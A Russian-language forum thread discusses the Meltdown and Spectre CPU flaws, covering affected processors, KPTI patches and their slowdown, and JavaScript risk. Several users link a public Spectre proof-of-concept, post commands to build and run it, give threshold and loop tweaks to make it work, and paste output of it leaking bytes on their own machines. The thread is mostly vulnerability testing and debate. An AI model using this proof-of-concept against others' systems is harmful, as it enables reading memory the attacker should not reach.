Обычные 32-бит армы то не подвержены.

У вас устаревшие, вчерашние данные. Бегом в первый пост за новыми и актуальными.

Ну так ведоргелистов было много, последователей еще больше.
Теперь што делать, ждать новый Самсунг S99.99 с пофикшеным проциком, за много денег. MWC еще далеко, только в марте...

Обычные 32-бит армы то не подвержены.

Они подвержены.

На этом основывались все внутрипроцессные песочницы

ну в таком виде становится яснее. что просто ещё одна новая тайминг атака. для софта, который к ним и так не был устойчив нового ничего.

Ты тестируешь exploit для Spectre, от которого защиты пока нет.

// b.

Ёк! mwc с 26 февраля.
так что не так и долго. А там новые лопатки, со старыми вёдрами %-) ДБ(!)

просто ещё одна новая тайминг атака

Ну да, ну да. Просто еще одна атака, nothing to see here, move on.

А что если кто-нибудь знал об этом еще в 1995? Раньше обнаружить эту уязвимость должно было быть даже легче.

Почему?

Только сегодня что-то перед глазьями табличку видел, может не на том заборе читал?

Так это косяк или бэкдор? Вот как после такой паранойи утверждать что Эльбрусы ненужны...

Их уже продают в обычных магазинах электроники? Нет? Тогда действительно не нужны

Писал почти утром: вторую ночь из-за этой дыры не сплю - иди на ***, мелкое анонимное ублюжество.

Мне вообще пох*ру на рускей езык - кто хоть на 0.5% имеет отношение к #infosec, обязан знать английский.

// b.

Ну да, ну да. Просто еще одна атака, nothing to see here, move on.

ты наводишь истерику. код, который сливает данные можно было писать и раньше. просто теперь для надежного кода придется учитывать не только утечку косвенных массивов защищенных проверками, но и возможность обойти эту защиту за счет спекуляций

В ОП написано, что подвержены лишь некоторые. А по ссылке со списком лор-эффект. Так что мне почитать.

будет ли в природе утиль из разряда - нажал кнопку, проверил и всё понятно.

Для Spectre вот (скопировать в файл spectre.c): https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6

sed 's/CACHE_HIT_THRESHOLD(80)/CACHE_HIT_THRESHOLD 80/' -i spectre.c
gcc -march=native spectre.c -o spectre
./spectre

Для Meltdown не нашел еще спролита.

Ожидаемо в приложениях с минимальным числом системных вызовов падения не наблюдается.

Как выше было замечено: неработоспособность данного кода - не гарантия того, что нельзя написать по-лучше и точнее.

«Защиты»? Всегда считалось, что код читает/пишет только те адреса, которые есть в коде (или вычисляются в коде). На этом основывались все внутрипроцессные песочницы. На данный момент эти песочницы бесполезны.

Это не так уж давно стали появляться разные биты для запрета (в основном писать) вне своих секций (кода, данных, стека). А вообще-то присвоить указателю адрес из адресного пространства процесса вроде никто не запрещал, я сейчас даже не очень пойму как запрет мог бы вообще работать, аппаратно-то защищается область из списка селекторов. Или я наламерил что-то сейчас?

У меня суся 42.3 амд фх 8350, после сегодняшнего патча работает если #define CACHE_HIT_THRESHOLD (150) выставить. До накатывания патча не тестил.

Я обновил арч, kpti enabled, а spectre приведенный выше у меня скорее не работает (левые символы вроде %, @, не те буквы, бОльшая часть - ?). Описание проца кидал тоже выше.

Я так понял, серьёзной проблемы для большинства пользователей нет. Если ты локально запустил бинарник с чем попало, скорей всего у тебя уже всё плохо

Среднестатистический человек просто не успеет просмотреть код всех его приложений. Кроме того есть те кто проводят обратную разработку вирусов. Так что всё очень плохо.

Но интересно, как будут бэкпортить kpti на какой-нибудь RHEL 6.

Будут и на 5, и на 4 - деньги-то за что им платят, как не за закрытие таких дыр?

AMD FX-8350 эксплойт со spectre срабатывает, правда пришлось увеличить число попыток tries с 999 до 99999.

Ещё один дебил, который не знает английский и не умеет Google:

https://ru.wikipedia.org/wiki/Расплавление_активной_зоны_ядерного_реактора

> AMD FX-8350

С таким ЦПУ майнить надо, а не работать. AES-NI на AMD, как оказалось, на уровне Intel Xeon.

Я обновил арч, kpti enabled, а spectre приведенный выше у меня скорее не работает (левые символы вроде %, @, не те буквы, бОльшая часть - ?). Описание проца кидал тоже выше.

попробуй увеличить 999 на 62 строке:

for (tries = 999; tries > 0; tries--) {

ты наводишь истерику

Какое счастье, что хладнокровный истинный ариец wieker ей не поддается.

который сливает данные можно было писать и раньше. просто теперь для надежного кода придется учитывать не только утечку косвенных массивов защищенных проверками, но и возможность обойти эту защиту за счет спекуляций

Напомнило классику:

«Вместо „малого дождика“ - душ из напалма и раз в неделю прыжки с Ниагарского водопада.»

Фигня вопрос.

NSA_KEY makes america great again

ты знал? ;)

Кстати, отработало с первого раза на Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz.

Что ты такой злой, я писал корректору, а не тебе, дорогой ;-)

Так что патчи уязвимость, а не бровируй знанием английского с переходом на личности.

Мне интересно - как? И как будут объяснять 30% потери (если PCID не перенесут заодно)?

Самое главное: «замедляющий на 5%-30% патч» необходим только для процессоров Intel !

В особой фазе луны это и амд касается.

но и AMD тоже (есть сообщения, что только при включении BPF JIT в ядре, что по умолчанию выключено)

для определенности - отпишитесь по возможности у кого не работают эксплойты

Так себе. #define CACHE_HIT_THRESHOLD (20) (больше - больше ?)

./spectre 
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfed68... Success: 0x54=’T’ score=17 (second best: 0x0D score=6)
Reading at malicious_x = 0xffffffffffdfed69... Unclear: 0x45=’E’ score=874 (second best: 0x52 score=866)
Reading at malicious_x = 0xffffffffffdfed6a... Unclear: 0x01=’?’ score=742 (second best: 0x45 score=721)
Reading at malicious_x = 0xffffffffffdfed6b... Unclear: 0x45=’E’ score=965 (second best: 0x15 score=950)
Reading at malicious_x = 0xffffffffffdfed6c... Unclear: 0x86=’?’ score=1186 (second best: 0xFA score=1184)
Reading at malicious_x = 0xffffffffffdfed6d... Unclear: 0x61=’a’ score=1187 (second best: 0x45 score=1174)
Reading at malicious_x = 0xffffffffffdfed6e... Unclear: 0x45=’E’ score=1011 (second best: 0x51 score=964)
Reading at malicious_x = 0xffffffffffdfed6f... Unclear: 0x69=’i’ score=1160 (second best: 0x5E score=1087)
Reading at malicious_x = 0xffffffffffdfed70... Unclear: 0x48=’H’ score=1180 (second best: 0xEF score=1167)
Reading at malicious_x = 0xffffffffffdfed71... Unclear: 0xBC=’?’ score=846 (second best: 0x15 score=845)
Reading at malicious_x = 0xffffffffffdfed72... Unclear: 0xE2=’?’ score=888 (second best: 0x28 score=883)
Reading at malicious_x = 0xffffffffffdfed73... Unclear: 0x45=’E’ score=1104 (second best: 0x86 score=1092)
Reading at malicious_x = 0xffffffffffdfed74... Unclear: 0xE3=’?’ score=1199 (second best: 0x45 score=1198)
Reading at malicious_x = 0xffffffffffdfed75... Unclear: 0x48=’H’ score=1107 (second best: 0xE2 score=1104)
Reading at malicious_x = 0xffffffffffdfed76... Unclear: 0x45=’E’ score=873 (second best: 0x48 score=841)
Reading at malicious_x = 0xffffffffffdfed77... Unclear: 0x15=’?’ score=585 (second best: 0x02 score=583)
Reading at malicious_x = 0xffffffffffdfed78... Unclear: 0x45=’E’ score=910 (second best: 0x56 score=839)
Reading at malicious_x = 0xffffffffffdfed79... Unclear: 0x02=’?’ score=503 (second best: 0x45 score=443)
Reading at malicious_x = 0xffffffffffdfed7a... Unclear: 0x45=’E’ score=655 (second best: 0x01 score=626)
Reading at malicious_x = 0xffffffffffdfed7b... Unclear: 0x45=’E’ score=650 (second best: 0x0D score=614)
Reading at malicious_x = 0xffffffffffdfed7c... Success: 0x53=’S’ score=2 
Reading at malicious_x = 0xffffffffffdfed7d... Unclear: 0x45=’E’ score=833 (second best: 0x88 score=773)
Reading at malicious_x = 0xffffffffffdfed7e... Unclear: 0x45=’E’ score=859 (second best: 0x60 score=821)
Reading at malicious_x = 0xffffffffffdfed7f... Success: 0x02=’?’ score=2 
Reading at malicious_x = 0xffffffffffdfed80... Unclear: 0x45=’E’ score=972 (second best: 0x56 score=850)
Reading at malicious_x = 0xffffffffffdfed81... Unclear: 0x62=’b’ score=1046 (second best: 0xA5 score=969)
Reading at malicious_x = 0xffffffffffdfed82... Unclear: 0x45=’E’ score=1142 (second best: 0x5E score=1118)
Reading at malicious_x = 0xffffffffffdfed83... Unclear: 0x45=’E’ score=1052 (second best: 0x93 score=952)
Reading at malicious_x = 0xffffffffffdfed84... Unclear: 0x45=’E’ score=1067 (second best: 0x52 score=980)
Reading at malicious_x = 0xffffffffffdfed85... Unclear: 0x45=’E’ score=1072 (second best: 0x15 score=965)
Reading at malicious_x = 0xffffffffffdfed86... Unclear: 0x45=’E’ score=1031 (second best: 0x88 score=931)
Reading at malicious_x = 0xffffffffffdfed87... Unclear: 0x45=’E’ score=1040 (second best: 0x88 score=987)
Reading at malicious_x = 0xffffffffffdfed88... Unclear: 0x45=’E’ score=1182 (second best: 0x11 score=1039)
Reading at malicious_x = 0xffffffffffdfed89... Success: 0x69=’i’ score=2 
Reading at malicious_x = 0xffffffffffdfed8a... Unclear: 0x45=’E’ score=1107 (second best: 0x93 score=1012)
Reading at malicious_x = 0xffffffffffdfed8b... Unclear: 0x45=’E’ score=1054 (second best: 0x67 score=992)
Reading at malicious_x = 0xffffffffffdfed8c... Unclear: 0x45=’E’ score=1178 (second best: 0x56 score=1092)
Reading at malicious_x = 0xffffffffffdfed8d... Unclear: 0x45=’E’ score=1161 (second best: 0x51 score=1091)
Reading at malicious_x = 0xffffffffffdfed8e... Unclear: 0x45=’E’ score=943 (second best: 0x93 score=835)
Reading at malicious_x = 0xffffffffffdfed8f... Unclear: 0x23=’#’ score=1078 (second best: 0xCA score=1047)

Если я правильно понял, для эксплуатации уязвимости злоумышленнику необходима возможность запустить собственный код на атакуемой машине.

т.е. если полностью отключить в браузере javascript, то данными уязвимостями воспользоваться не получится?

>> Самое главное: «замедляющий на 5%-30% патч» необходим только для процессоров Intel !

> В особой фазе луны это и амд касается.

Не совсем. Meltdown на AMD нет вообще. Не просто так Kpиc пользовался Duron 1600 MHz.

Процитированный тобой кусочек - это про Spectre.

Или я наламерил что-то сейчас?

Почти всё. Ты приписал песочницам то, что относится к нативным приложениям.

История движется по спирали.

И где же высоко технологическая цивилизация до текущей?

> т.е. если полностью отключить в браузере javascript, то данными уязвимостями воспользоваться не получится?

Это значительно обезопасит сёрфинг. Можно также взломать TCP/IP пакетом. Например роутер на ARM-е.

Есть же на AMD, просто там вроде надо что-то включить, что выключено по-дефолту. Знатоки суммонятся в тред.

эльбрусы

кстати, нет никаких гарантий, что там похожего нет.:-|

онип просто не смогли всё у штеуда скопировать! лузири!

Да и пора браузерам существенно ограничить JS в потенциально опасных возможностях (ведь на что-то типа Lua они явно не заходят спрыгивать).

Какая им выгода менять js на lua?

CACHE_HIT_THRESHOLD тебе вроде наоборот нужно увеличивать. Попробуй 160

RHEL 7 @ Intel(R) Xeon(R) CPU X5550 @ 2.67GHz

Ядро 3.10.0-693.5.2.el7.x86_64:

$ dd if=/dev/zero of=/tmp/testfile bs=512 count=5000000                        
5000000+0 records in                                                                                
5000000+0 records out                                                                               
2560000000 bytes (2.6 GB) copied, 6.99513 s, 366 MB/s                                               
$ ./Spectre | head -4                                                          
Reading 40 bytes:                                                                                   
Reading at malicious_x = 0xffffffffffdffb10... Success: 0x54=’T’ score=2                            
Reading at malicious_x = 0xffffffffffdffb11... Success: 0x68=’h’ score=2                            
Reading at malicious_x = 0xffffffffffdffb12... Success: 0x65=’e’ score=2 

Ядро 3.10.0-693.11.6.el7.x86_64:

$ dd if=/dev/zero of=/tmp/testfile bs=512 count=5000000                        
5000000+0 records in                                                                                
5000000+0 records out                                                                               
2560000000 bytes (2.6 GB) copied, 22.719 s, 113 MB/s                                                
$ ./Spectre | head -4                                                          
Reading 40 bytes:                                                                                   
Reading at malicious_x = 0xffffffffffdffb10... Success: 0x54=’T’ score=2                            
Reading at malicious_x = 0xffffffffffdffb11... Success: 0x68=’h’ score=2                            
Reading at malicious_x = 0xffffffffffdffb12... Success: 0x65=’e’ score=2

Вот такие пирожки. Интересно, как будут этот Spectre зашивать и будут ли вообще.

Фигня вопрос.

Не понимаю, что заставляет тебя ерничать.

И раньше любая программа оставляла после себя трейс из сайдэффектов. По этому трейсу теоретически можно было восстановить ее состояние. Ну оказалось, что в этом трейсе оказывается дотупно несколько больше, чем считалось ранее информации. Почему э\то проблема процессора? Что, в текущих условиях нельзя писать программы так, чтобы «гаджетов» сливающих память по произвольным адресам в них не было? Я ж не крутой специалист, но, думается, защищенный код писать можно и сейчас. Например, явно приводить в заданные границы числа, использующиеся для косвенной адресации.

и как теперь вирусы исследовать?

Почти всё. Ты приписал песочницам то, что относится к нативным приложениям.

Вопрос принципиальный. Если spectre угрожает только JIT песочницам и интерпретаторам, то это конечно довольно неприятно, но в принципе жить можно, а если нативное приложение сможет читать данные из другого адресного пространства (хотя бы и только ring 3), на которые нет debug-привилегий, вот это уже задница.

бровируй

бровями?

Не понимаю, что заставляет тебя ерничать.

То, что ты считаешь, что глубоко в теме, но говоришь почему-то банальности, и при этом обвиняешь меня в истерике.

Чем удобнее ;-)